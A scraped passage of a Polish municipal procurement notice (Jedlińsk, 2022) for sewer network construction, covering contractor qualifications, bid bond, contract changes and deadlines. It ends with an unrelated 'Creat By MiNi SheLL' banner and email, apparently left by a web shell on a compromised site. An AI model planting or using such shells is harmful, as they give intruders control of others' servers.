gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące:<br/><br/>1.	ZDOLNOŚCI DO WYSTĘPOWANIA W OBROCIE GOSPODARCZYM:<br/>Zamawiający nie określa warunków w ww. zakresie. <br/><br/>2.	UPRAWNIEŃ DO PROWADZENIA OKREŚLONEJ DZIAŁALNOŚCI GOSPODARCZEJ LUB ZAWODOWEJ, O ILE WYNIKA TO Z ODRĘBNYCH PRZEPISÓW:<br/>Zamawiający nie określa warunków w ww. zakresie. <br/><br/>3.	SYTUACJI EKONOMICZNEJ LUB FINANSOWEJ:<br/>Zamawiający nie określa warunków w ww. zakresie. <br/><br/>4.	ZDOLNOŚCI TECHNICZNEJ LUB ZAWODOWEJ: <br/>a) doświadczenie wykonawcy:<br/>1)	Wykonawca winien wykazać, że wykonał należycie nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:<br/>co najmniej jednej roboty budowlanej która:<br/>−	polegała na budowie lub przebudowie lub remoncie sieci kanalizacji sanitarnej<br/>−	miała wartość minimum 1 500 000,00 zł brutto (słownie: jeden milion pięćset tysięcy złotych brutto).<br/>2) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować w okresie wykonywania zamówienia i skierują do jego realizacji:<br/><br/>a) min. jedną osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń wodociągowych i kanalizacyjnych lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do wyżej wskazanych - co najmniej 3 letnie doświadczenie w pełnieniu funkcji Kierownika budowy/robót instalacyjnych z zakresu budowy, przebudowy, remontu sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych (licząc od daty uzyskania odpowiednich uprawnień); -Kierownik budowy <br/>b) min. jedną osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności drogowej lub równoważnych wydanych na podstawie wcześniej obowiązujących przepisów - co najmniej 3 letnie doświadczenie w pełnieniu funkcji Kierownika budowy/robót drogowych z zakresu budowy, przebudowy, remontu dróg (licząc od daty uzyskania odpowiednich uprawnień);- kierownik robót drogowych <br/>c) min. jedną osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub równoważnych, wydanych na podstawie wcześniej obowiązujących przepisów - co najmniej 3 letnie doświadczenie w pełnieniu funkcji Kierownika budowy/robót instalacyjnych z zakresu budowy, przebudowy, remontu sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych (licząc od daty uzyskania odpowiednich uprawnień); );- kierownik robót elektrycznych <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>9.2.1	potwierdzających brak podstaw wykluczenia:<br/><br/>a)	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 ze zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – wg Załącznika nr 5;<br/>b)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; (Zamawiający pobierze samodzielnie z ogólnodostępnych rejestrów Wykonawca nie musi załączać do dokumentów na wezwanie)<br/><br/>Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej– składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. <br/><br/>Dokumenty potwierdzające w/w okoliczności powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. <br/><br/>c)	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia <br/>z postępowania wskazanych przez Zamawiającego, o których mowa w:<br/>a)	art. 108 ust 1 pkt 1 i 2 ustawy Pzp<br/>b)	art. 108 ust. 1 pkt 3 ustawy Pzp, dotyczącą wydania prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne.<br/>c)	art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego,<br/>d)	art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>e)	art. 109 ust. 1 pkt 4 ustawy Pzp - wg załącznika 12 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>9.2.2	potwierdzających spełnianie warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej (doświadczenie, kwalifikacje zawodowe kadry technicznej):<br/><br/>a)	wykazu doświadczenia - wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz, których usługi zostały wykonane wraz z załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami o których mowa są referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego roboty były wykonywane, a jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy, w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające wykonywanie usług powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert załącznik nr 3<br/>b)	wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami sporządzonego zgodnie z załącznikiem nr 4<br/>9.2.3	Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, zamawiający może na każdym etapie postępowania wezwać wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych.<br/>9.2.4	Wykonawca składa podmiotowe środki dowodowe na wezwanie zamawiającego. Dokumenty te powinny być aktualne na dzień ich złożenia</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany wnieść wadium w wysokości: 70.000,00 zł (słownie: siedemdziesiąt tysięcy zł)<br/>Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a)	pieniądzu;<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego:<br/>Południowo Mazowiecki Bank Spółdzielczy w Jedlińsku 06 9132 0001 0000 0433 2000 0030 z adnotacją „Wadium – Znak sprawy: ZP.271.05.2022 ”<br/>10.2 Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.<br/>10.3 Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej – przed upływem terminu składania ofert.<br/>10.4 W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy:<br/>a)	nazwę: dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta lub poręczyciela oraz wskazanie ich siedzib,<br/>b)	kwotę wadium,<br/>c)	termin ważności gwarancji/poręczenia w formule: „od dnia …….– do dnia ………”,<br/>d)	zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty wskazanej w gwarancji/poręczeniu na pierwsze żądanie Zamawiającego w sytuacjach zatrzymania wadium określonych w przepisach ustawy.<br/>10.5 Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>10.6 Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy Pzp.<br/>. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku:<br/>-Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu<br/>albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>- Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem. Załącznik nr 7 załączany<br/>wraz z ofertą.<br/>w przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do<br/>ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania<br/>w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty.<br/>Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:<br/>- postępowania o zamówienie publiczne, którego dotyczy,<br/>- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu<br/>siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>d) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący<br/>uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi<br/>wykonają poszczególni wykonawcy.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców,<br/>którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są<br/>zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni wykonawcy.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy stanowią załącznik nr 8 do SWZ.<br/> Złożenie oferty jest jednoznaczne z akceptacją przez wykonawcę projektowanych postanowień umowy.<br/><br/>Zamawiający przewiduje zmiany umowy na podstawie art. 455 i 436 pzp w szczególności w zakresie:<br/>a) wystąpienia wyjątkowych okoliczności, niezależnych od stron umowy, których nie można było przewidzieć w chwili zawierania umowy, a wpływają na jej realizację;<br/>b) zmiany podwykonawców, których udział w realizacji przedmiotu umowy zaakceptował Zamawiający;<br/>c) zmiany jakości lub innych parametrów charakterystycznych dla objętego proponowaną zmianą elementu prac;<br/>d) zmiany w terminach wykonywania prac;<br/>e) zmiany ilości prac;<br/>f) rezygnacji z wykonania części prac;<br/>g) terminu wykonania przedmiotu umowy<br/>h) zmianę wynagrodzenia<br/>Przewidziane zmiany umowy szczegółowo opisane zostały w projekcie umowy stanowiącego załącznik nr 8 do SWZ; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-07 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://jedlinsk.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-07 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Uwaga!<br/>Gmina co do zasady jest zamawiającym klasycznym, jednakże zgodnie z art. 5 ust 1 pkt 1 pzp przepisy ustawy stosuje się do zamawiających sektorowych, którymi są: 1) zamawiający publiczni w zakresie, w jakim wykonują jeden z rodzajów działalności sektorowej, o której mowa w art. 5 ust. 4 pzp<br/><br/>Zgodnie z treścią komentarza do art. 5 pzp „ Zamawiających sektorowych wskazanych w art. 5 można zasadniczo podzielić na trzy grupy. Wspólnym mianownikiem dla wszystkich kategorii podmiotów mieszczących się w tych grupach jest to że aby mogły one zostać zaliczone do zamawiających sektorowych powinny wykonywać jedną z działalności wymienionych w art. 5 ust 4 pzp. Pierwszą grupę stanowią zamawiający publiczni wskazani w art. 4 pzp tj. jednostki sektora finansów publicznych.”<br/>Zgodnie z art. 4 pkt 1 do kategorii zamawiających publicznych w części zaliczanej do sektora finansów publicznych na podstawie przepisów ustawy o finansach publicznych należy zaliczyć jednostki samorządu terytorialnego.<br/>Przynależność danego podmiotu do przynajmniej jednej kategorii jednostek sektora finansów publicznych determinuje status tego podmiotu jako zamawiającego na gruncie pzp. Podmiot ten stosuje pzp jako zamawiający publiczny a w okolicznościach określonych w pzp tj. Gdy prowadzi działalność sektorową i udziela zamówienia w celu prowadzenia tej działalności jako zamawiający sektorowy -art. 5 ust 1 pkt 1 pzp”<br/><br/>Art. 7 ust. 35 stanowi, że zamówieniem sektorowym – jest zamówienie udzielane przez zamawiającego sektorowego w celu prowadzenia jednego z rodzajów działalności sektorowej, o której mowa w art. 5 ust. 4; <br/>W związku z czym gmina ma obowiązek prowadzić postępowanie zgodnie z przepisami ustawy Pzp określonymi w Dziale V, dla których ustawodawca zgodnie z art. 2 ust. 1 pkt 2) ustawa będzie miała zastosowanie do udzielania przez zamówień sektorowych, których wartość jest równa lub przekracza progi unijne. Udzielania zamówień sektorowych dotyczy Dział V PZP, w którym procedura dotycząca tych zamówień została uregulowana.<br/>W celu zachowania zasady konkurencyjności i transparentności Zamawiający prowadzi postępowanie z zastosowaniem ustawy Pzp pomimo braku takiego obowiązku.<br/><br/>W postępowaniu nie przysługują środki ochrony prawnej. Są to zamówienia sektorowe. Zamówienia o wartości niższej niż wskazana powyżej nie podlegają ustawie pzp. – wówczas ustawa PZP (w tym także przepisy dotyczące środków ochrony prawnej) nie znajdują zastosowania.<br/><br/>KIO (sygn. akt: 2824/12): „Bez znaczenia dla uprawnień wykonawców co do możliwości składania środków odwoławczych jest fakt, że Zamawiający dobrowolnie do prowadzonego postępowania stosuje określony tryb i zasady obowiązujące w ustawie PZP. Dlatego też Odwołujący w przedmiotowym postępowaniu o wartości poniżej progów unijnych nie mógł skorzystać ze środka ochrony prawnej, jakim jest odwołanie do KIO.” KIO, odrzucając odwołanie, powołała się na art. 189 ust. 2 pkt 1 PZP, zgodnie z którym „Izba odrzuca odwołanie, jeżeli stwierdzi, że: 1) w sprawie nie mają zastosowania przepisy ustawy;”, w związku z art. 133 ust. 1 PZP, w którym wskazano, że „Do udzielania zamówień sektorowych ustawę stosuje się, jeżeli wartość zamówienia jest równa lub przekracza kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8.” ( teza aktualna dla postepowań prowadzonych w trybie ustawy z dnia 11 września 2019r). <br/>Zgodnie z art. 528 pkt 1 „Przesłanki odrzucenia odwołania” Izba odrzuca odwołanie, jeżeli stwierdzi, że w sprawie nie mają zastosowania przepisy ustawy;

Creat By MiNi SheLL
Email: jattceo@gmail.com